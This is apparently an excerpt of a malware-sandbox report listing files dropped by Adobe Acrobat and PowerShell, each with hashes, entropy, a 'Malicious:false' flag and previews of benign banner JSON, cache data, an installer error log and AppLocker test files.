                                                                                      SHA-512:458BF0CC05B5ECA938FC4E8DFF0CF58EF26FEE05B74D721D8C97A45FB53E1F18EEB836E894F2693F21CC601D2A70B1594AFDF0054566EF1ECCE715911DD9D3F6
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1123
                                                                                      Entropy (8bit):5.686188589427989
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XvpUXn6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSz:YvMwn6hgy6SAFv5Ah8cv/z
                                                                                      MD5:368B9EBA5886B5BFDEB94106C9DDCF4D
                                                                                      SHA1:9317D00138931F0D655C834E33CFC3C1E3F3391C
                                                                                      SHA-256:B81C95098941D28134A4BF1BFD1F32188D437C5635BA6B8E653A6CA052374525
                                                                                      SHA-512:FBEFE5AE2DF8A6C3787C1B030D23F2C662D348CE7EFF0F45E54C15DF13B0C178F105290E97D670A407C54C49EB6CB1804DFA5D30B8C2DE5D495476FC1B000ABF
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.255308902577808
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf8dPeUkwRe9:YvXKXsvyB3pUTbdFVGU8Ukee9
                                                                                      MD5:3AB4DC7FDE8055E0A5648010ED64188E
                                                                                      SHA1:AEA85AE0BA73C9B3B7C810A283C2C49387630850
                                                                                      SHA-256:5CC301C39183ED33F05BC8D14EE1FDE0312142C138B4135C5FD7DA5D5FDC09E5
                                                                                      SHA-512:CED1413B0986B9C30091DD541EE1C1318BA8A316EA962A29385F6D33BBCEA55CB1282E94452BE9A9AC439A32A3DEABB180C7BB24026EB82E4A48CFFCAD67C11E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.257781685598484
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfQ1rPeUkwRe9:YvXKXsvyB3pUTbdFVGY16Ukee9
                                                                                      MD5:1F5B952F6468444A3BB3659A1C652FC3
                                                                                      SHA1:A7159CDC2E6C0B646F07391939DB4DCF2313D8B1
                                                                                      SHA-256:541AA3EF07B121359056425B164D0C09BE94829083B8E9E95FFB8ADBD7C829B3
                                                                                      SHA-512:795667C787CFF70348CBAA92A551C5F770FDC8A96A70C30D508DC6E34367B3C6E9C5A2603DD3E2CCB3226B8F4686EE36EE34E17C82FF92A621AB4497363D9CCA
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.266752648577599
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfFldPeUkwRe9:YvXKXsvyB3pUTbdFVGz8Ukee9
                                                                                      MD5:B3594BB84B670BC4FD53E742970A3CC5
                                                                                      SHA1:875C7C2079958F1380AF61C7373FBCD936E8138C
                                                                                      SHA-256:A891BEA67289D3D6AB06A08CD89D17F582299940E67D2D5F10F5C3E509C75E67
                                                                                      SHA-512:7BEAA27713E216914D6E15E595CB66C79CA8C43A940DD817BC2905E4276CDFEAA898BD2B2631D31466B3E1705D8245F2F2B6F760E40049F16024B1ED1E472954
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.283388831034492
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfzdPeUkwRe9:YvXKXsvyB3pUTbdFVGb8Ukee9
                                                                                      MD5:196EEB3B7A5AD92F1427363A9EBC8719
                                                                                      SHA1:0B68EA754A1D4B4E43941484E6DDDE0B2B2D7951
                                                                                      SHA-256:948C3382E1C4B3662BC1706856AAF5A36628ED3FCC4DB8E950EBB74E61E3873D
                                                                                      SHA-512:4E169742ABC4B4B1D4404550701B3638F482D02C12142DC48CB151E7CE6BD2AD40CE3BCA799741A3CA0CDA4754AB07889BF95566F3BAB2E597FA17D23098091F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.262679669316352
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfYdPeUkwRe9:YvXKXsvyB3pUTbdFVGg8Ukee9
                                                                                      MD5:20B447B86D373AEF9027A25D34C156A6
                                                                                      SHA1:D20BE7C391FA1CAC3E65F1D8BC4742D49F75D4D8
                                                                                      SHA-256:147857C896CDB89F765340B015B6C23DB4CFC6F5D22C1FDC8595D90574D2A362
                                                                                      SHA-512:6E0C57C719AB5E97026785D954C456B3D77DC656AA06429D22AD79CD03D0612FE3846DD7CE51C90A69B7A5A61F6D83D8A69475FAE2A5B72BD3002463B076871B
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.24837198499145
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf+dPeUkwRe9:YvXKXsvyB3pUTbdFVG28Ukee9
                                                                                      MD5:F7D34EA785A869FE581E76289E362F21
                                                                                      SHA1:6E4697DF5B9FC0C41794C2673283FE2D93F8EE71
                                                                                      SHA-256:F5B19E02D32905B37746EAAB5D1D26D4AE42901C2B9DBF1B8DB953C07D9DEE6F
                                                                                      SHA-512:ECD59B907532A56C67AAD3D9942454FDC3ECC9D1EBF5E10A8DE40B090C5F3A24A177DED73E9E9A1930D421345A979C40B35D400CD0563CD807B8B18DF59CAAAB
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.246483264108316
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfbPtdPeUkwRe9:YvXKXsvyB3pUTbdFVGDV8Ukee9
                                                                                      MD5:E9BE0A54297965B96D7A990443417838
                                                                                      SHA1:8B8D4D7760648293D7FE86A35D994CAD26335B60
                                                                                      SHA-256:4AD81B8FDF33694799D2C9BD3E935C9CBFA24445A3A82E06F4D2C92BBA6BFA92
                                                                                      SHA-512:AE7BAE5FD7E0826DCF849C6A0BE5932D5FD5E82AA58B27B72388B79C87D9E3CBFBA6D321129F6D5CE39F8BC169C211B7FF7D546A1F6793745C86F4072B915B80
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.248698265222601
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJf21rPeUkwRe9:YvXKXsvyB3pUTbdFVG+16Ukee9
                                                                                      MD5:490AB2D973C080FFC6A7CBBC6BCAE48A
                                                                                      SHA1:AE99D79E428E17222DFC7E930402192F99767315
                                                                                      SHA-256:9412686392DE709E8329F48ADAF4A1FAD8B9F8A2DEE6340EDCDB688921562115
                                                                                      SHA-512:1119F77286C071223D1ED292C8F737C3D4E7091CC8D58867B9154D16BB794129584F15DD6130AD9B73438FDE72F72197A8B1D6253018C9137D375FE9834E248F
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.661948484551362
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6XvpUXnmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSz:YvMwnoBgkDMUJUAh8cvMz
                                                                                      MD5:80156874CCAB49AA0A3A4EBB29651217
                                                                                      SHA1:9EFA28F57C8CDA91E9ED0701C0046556EE85A481
                                                                                      SHA-256:48337602AD34F188FF6873AAC2E3EBF4432CDC139CB0DD63D3A664556A7DD347
                                                                                      SHA-512:6749067BDEFCF442ABCF8815AC3D2E1AED86B023C8B30C22BB0BF2E0E4260E2A422F0EE3D47F01980748A46D76FF1D89A2AC638B3BDDC1BD828D397BAF262E5E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.223285754472847
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJfshHHrPeUkwRe9:YvXKXsvyB3pUTbdFVGUUUkee9
                                                                                      MD5:0B3DE5C30545E7F564BA9670F5298C8E
                                                                                      SHA1:DE750BBA64561AD20BB231EFF81CBE2F43C2BB4E
                                                                                      SHA-256:2762A9E34E3EE6C994C3A48F1BA42E0FE2C7127CC96519B07F56FF32970ED39B
                                                                                      SHA-512:FF120987370C3CE3C9953C89A9815E4CD59AC654A129E6F805B83D2998C11C6035E166F85FB277A04FD2A64FBEC410069341B2703F0DFF6A8D89C5DF1929BC76
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.232538743281086
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXrYvydDeYpUXjb24kF0YkeoAvJTqgFCrPeUkwRe9:YvXKXsvyB3pUTbdFVGTq16Ukee9
                                                                                      MD5:477F6C0833C467D3CB77DB271DE0E1FD
                                                                                      SHA1:F72A6B3A02B847E96A2AE29028A18273F59A0FAB
                                                                                      SHA-256:7808A0F6D178C87A91D4C59CA36AD19F1C59400BA13CEA7178681F027AAA97B6
                                                                                      SHA-512:D917929093E13E1A5F440482C66B1DE0CDD794F2EAB268F1F26A672B8B722CFB49289AF6D60BD5AE4F3662236D9B8EE1A522CFCB95196A35127B6237EA1088F4
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"747f0338-cdcf-489b-8d89-fdfc8ede0280","sophiaUUID":"6124E582-3DD2-4C2A-B4CB-31313081B829"},"encodingScheme":true,"expirationDTS":1734782111094,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.135587288361188
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Y5ok+aJ4mayETPmq9aUezjV9U1WnSWjPTcj0S2+CG2GVX2LSICGMlZk70zV5+IK6:Y5oTusePQ1GlPTu7dnJi0ZJRMIu9knz
                                                                                      MD5:FB99BC7A9E4BC0CA221494B12C5354F1
                                                                                      SHA1:957DA4D931082C8E02F3A9077D59478FD02AC7A3
                                                                                      SHA-256:039A879E44EDFF4A0CC4000C03F08CC3835008C51C6D37859794010774B6B9C6
                                                                                      SHA-512:397EEB8DC185C8E7D75AB7E592424B3C1F12C7E2FCDC7E583DC2912A5562CF8D350169C18BA180015E5391E05FA491610F0AFD3F063E66533718C47A6114FD9D
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"69ff87e55d9699bd91e9690a7037ca7c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608725000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b126a9614c1cc94fd401d9f9c8b49280","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734608725000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"0c9dc875f62a4944a043f1a44fa0cbf1","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734608725000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"40b04372bff7ce65cd4e4418b8a5c1c7","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734608725000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"7d6226b7ae6f016401819b500d3753e2","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734608725000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"b6deb49bfb2be9e7b7476b0c6f94088c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.3194898193238873
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLKufx/XYKQvGJF7urs9O3KaiZ3FL63FLesb+sZobF16R6FdpqpQ6YdS+EXSqXl/:TGufl2GL7msUKB0M0+Tb608YdLrlS
                                                                                      MD5:0A7AF083077F36CBAA92364ED154FDAF
                                                                                      SHA1:E9D17D22C4BE19E71BA407EACC439F89B3B98B24
                                                                                      SHA-256:FC47886426F50B044AABD9066BA71602A431071E8D204500F2617FCDCABDFE53
                                                                                      SHA-512:B7FE45127955F234D705683B34C378A2C9D56F7B5818E9DF11ADF20D06721E571A13AC4B18BC2C4461AABCBB3981C75A5AA5531E10D94A4DD26CA81148FBA097
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.782420791039616
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7McmKB0M0+Tb608YdyrGKEnqFl2GL7msz:7fJFb608YUcKVmsz
                                                                                      MD5:3D9CF45274FEE3A102362436E4741E87
                                                                                      SHA1:E633BFA3D6A2E071012F97094E735C5749AD1CB5
                                                                                      SHA-256:B6504927EB40845E1EFABCA9242A7EF27D60CF68345A26B065159C5AB80C87C3
                                                                                      SHA-512:9DCBC97CA6B105043D62FEC2991D518BBBC0B7DB026F17117A104DA3FD6FE6F7887F606DEE8779CAA7D1373186C6CE95B6DE2D37DA43890C0BC4B6D4F3595E53
                                                                                      Malicious:false
                                                                                      Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEg55pqtTyuN+1BT8EuZeOsqlwHmz0Y4Yyu:6a6TZ44ADE55cP8jTJuZe8wK
                                                                                      MD5:56193CE1D58B67A398470CF973F66587
                                                                                      SHA1:4FA52274AA682B6F475D0AFCE1992C7DDE072C81
                                                                                      SHA-256:47B20409E81DA3A5CA87388459534831DD1D7410A7208BF50DFC31305403FFAA
                                                                                      SHA-512:85B0A6A6E848E4D9D435EF6A04F0EE36B461F690A5EC896BFDC353964D27A15617EB2896390EE30FB74E3916ABE5019830BFBBE768635E57746DBBC05C89987E
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlllulzych:NllUec
                                                                                      MD5:599AEF4CF899A068F1C52942AC2767D6
                                                                                      SHA1:0551ACAAAAD90D63B311551C3436A627D88F1A23
                                                                                      SHA-256:B1DB9D56B886B8A53FBCED14386BB9A9258DD0008EADA73181C655A9D4A33E30
                                                                                      SHA-512:BAFAE235810B95669C88DB19FF84A9549CB8FD66663E1DFA48B0BE15DD3F8DC177ECF970E41E0AFE82E2773EF0F2826629F47E444891A95ADF1A2400494F9B1B
                                                                                      Malicious:false
                                                                                      Preview:@...e...................................y............@..........
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.53559722477471
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAmtrCH:Qw946cPbiOxDlbYnuRKyU
                                                                                      MD5:CB14CDD19050DB86A42AA8DA5CE99909
                                                                                      SHA1:AA56DF77D3759284BD8F55757E02C85F9BBF02B7
                                                                                      SHA-256:9C87CF058D6706F9D6297B118AB28E26E37EB53FB68BCF8F56A75C9DC7DB0577
                                                                                      SHA-512:465B9D1857E82CA8352E5E34B3CB3F88C3E425E1E03CB4823E5A3E2A3EE5C6D75A15966E9655FB8D0999601327582C8D327B15C62EEF6BDAB5845039F3B4394A
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.5.:.2.3. .=.=.=.....
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
